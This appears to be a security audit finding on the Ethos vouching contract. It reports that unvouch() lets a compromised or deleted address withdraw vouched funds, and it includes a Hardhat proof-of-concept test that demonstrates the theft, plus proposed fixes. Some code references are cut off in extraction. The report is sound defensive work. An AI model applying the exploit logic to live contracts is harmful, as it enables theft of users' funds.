Overt Alabaster Cottonmouth
The protocol comments the following inside unvouch():
// because it's $$$, you can only withdraw/unvouch to the same address you used to vouch
// however, we don't care about the status of the address's profile; funds are always attached
// to an address, not a profile
But the protocol does not also check if the address belongs to the profile anymore.
This leads to the following vulnerability:
- Alice vouches for Bob using address A1.
- A1 gets compromised and Alice marks it as compromised. (Alternatively, A1 is deleted by Alice and A1 gets assigned to some other profile id).
- The attacker who compromised A1 can still call
. - The funds get sent back to A1, which the attacker now controls.
- Alice has no recourse to block the attacker's actions or recover her funds.
Two impacts:
- A compromised/deleted address is able to steal the funds via
. - Even if a check is introduced to block such addresses from receiving funds, there exists no way to rescue these funds and return to the rightful author.
Apply the following patch inside test/EthosVouch.test.ts
and see it pass when run via npm run hardhat -- test --grep "should allow compromised address to unvouch and receive funds"
diff --git a/ethos/packages/contracts/test/EthosVouch.test.ts b/ethos/packages/contracts/test/EthosVouch.test.ts
index be4d7f1..0424b29 100644
--- a/ethos/packages/contracts/test/EthosVouch.test.ts
+++ b/ethos/packages/contracts/test/EthosVouch.test.ts
@@ -1,10 +1,11 @@
import { loadFixture, time } from '@nomicfoundation/hardhat-toolbox/network-helpers.js';
import { expect } from 'chai';
import hre from 'hardhat';
import { smartContractNames } from './utils/mock.names.js';
+import { common } from './utils/common.js';
const { ethers } = hre;
describe('EthosVouch', () => {
const DEFAULT_COMMENT = 'default comment';
const DEFAULT_METADATA = '{ "someKey": "someValue" }';
@@ -1202,9 +1203,78 @@ describe('EthosVouch', () => {
.to.be.revertedWithCustomError(ethosVouch, 'NotAuthorForVouch')
.withArgs(0, 5);
+ describe('Vouch security', () => {
+ it('should allow compromised address to unvouch and receive funds', async () => {
+ const {
+ ethosProfile,
+ ethosVouch,
+ OTHER_0,
+ } = await loadFixture(deployFixture);
+ // Set up profile for voucher
+ await ethosProfile.connect(OWNER).inviteAddress(VOUCHER_0.address);
+ await ethosProfile.connect(VOUCHER_0).createProfile(1);
+ // Set up profile for subject
+ await ethosProfile.connect(OWNER).inviteAddress(PROFILE_CREATOR_0.address);
+ await ethosProfile.connect(PROFILE_CREATOR_0).createProfile(1);
+ // VOUCHER_0 creates a vouch for PROFILE_CREATOR_0
+ const vouchAmount = ethers.parseEther('100');
+ await ethosVouch.connect(VOUCHER_0).vouchByProfileId(
+ 3, // PROFILE_CREATOR_0's profile ID
+ 'Vouch comment',
+ 'Vouch metadata',
+ { value: vouchAmount }
+ );
+ // Get VOUCHER_0's balance before their address is compromised
+ const voucherBalanceBefore = await ethers.provider.getBalance(VOUCHER_0.address);
+ // Now simulate VOUCHER_0's address being compromised
+ // First register a new address for their profile so they can mark original as compromised
+ const randValue = BigInt('29548234957'); // Using a deterministic value for testing
+ const signature = await common.signatureForRegisterAddress(
+ OTHER_0.address,
+ '2', // VOUCHER_0's profile ID
+ randValue.toString(),
+ );
+ await ethosProfile
+ .connect(VOUCHER_0)
+ .registerAddress(OTHER_0.address, 2, randValue, signature);
+ // Mark VOUCHER_0's original address as compromised using their new address
+ await ethosProfile.connect(OTHER_0).deleteAddress(VOUCHER_0.address, true); // <------- Alternatively, can pass `false` as last param if only want to delete, without marking as compromised
+ // Verify the address is marked as compromised
+ expect(await ethosProfile.isAddressCompromised(VOUCHER_0.address)).to.be.true; // <------- comment this if not marked as compromised in the step above
+ // Despite being compromised, the address can still unvouch and receive funds
+ // Simulate the attacker who now controls VOUCHER_0's compromised address
+ const unvouchTx = await ethosVouch.connect(VOUCHER_0).unvouch(0);
+ await unvouchTx.wait();
+ // Check that the compromised address received the funds
+ const voucherBalanceAfter = await ethers.provider.getBalance(VOUCHER_0.address);
+ // The balance should have increased (minus gas costs)
+ expect(voucherBalanceAfter).to.be.closeTo(voucherBalanceBefore + ethers.parseEther('100'), ethers.parseEther('0.001'));
+ // Verify the vouch is now archived
+ const vouch = await ethosVouch.vouches(0);
+ expect(vouch.archived).to.be.true;
+ });
+ });
- Add the check to revert if a compromised/deleted author address attempts to be the recipient of
function unvouch(uint256 vouchId) public whenNotPaused nonReentrant {
Vouch storage v = vouches[vouchId];
// because it's $$$, you can only withdraw/unvouch to the same address you used to vouch
// however, we don't care about the status of the address's profile; funds are always attached
// to an address, not a profile
if (vouches[vouchId].authorAddress != msg.sender) {
revert AddressNotVouchAuthor(vouchId, msg.sender, vouches[vouchId].authorAddress);
+ // get the profile id of the author
+ uint256 profileId = IEthosProfile(
+ contractAddressManager.getContractAddressForName(ETHOS_PROFILE)
+ ).verifiedProfileIdForAddress(msg.sender);
+ _vouchShouldBelongToAuthor(vouchId, profileId);
v.archived = true;
// solhint-disable-next-line not-rely-on-time
v.activityCheckpoints.unvouchedAt = block.timestamp;
// remove the vouch from the tracking arrays and index mappings
// apply fees and determine how much is left to send back to the author
(uint256 toWithdraw, ) = applyFees(v.balance, false, v.subjectProfileId);
// set the balance to 0 and save back to storage
v.balance = 0;
// send the funds to the author
// note: it sends it to the same address that vouched; not the one that called unvouch
(bool success, ) = payable(v.authorAddress).call{ value: toWithdraw }("");
if (!success) {
revert FeeTransferFailed("Failed to send ETH to author");
emit Unvouched(v.vouchId, v.authorProfileId, v.subjectProfileId);
- The second fix is more of a design decision which the protocol can take. There should be a way to recover this fund on calling
. Either a new convenience functionreassignVouchAddress()
can be added which looks something like this:
function reassignVouchAddress(
uint256 vouchId,
address newAddress,
bytes calldata signature // Signed proof of new address ownership
) external {
Or the admin could float a proposal which allows them to rescue funds from such compromised vouches, and introduce a new function for the same.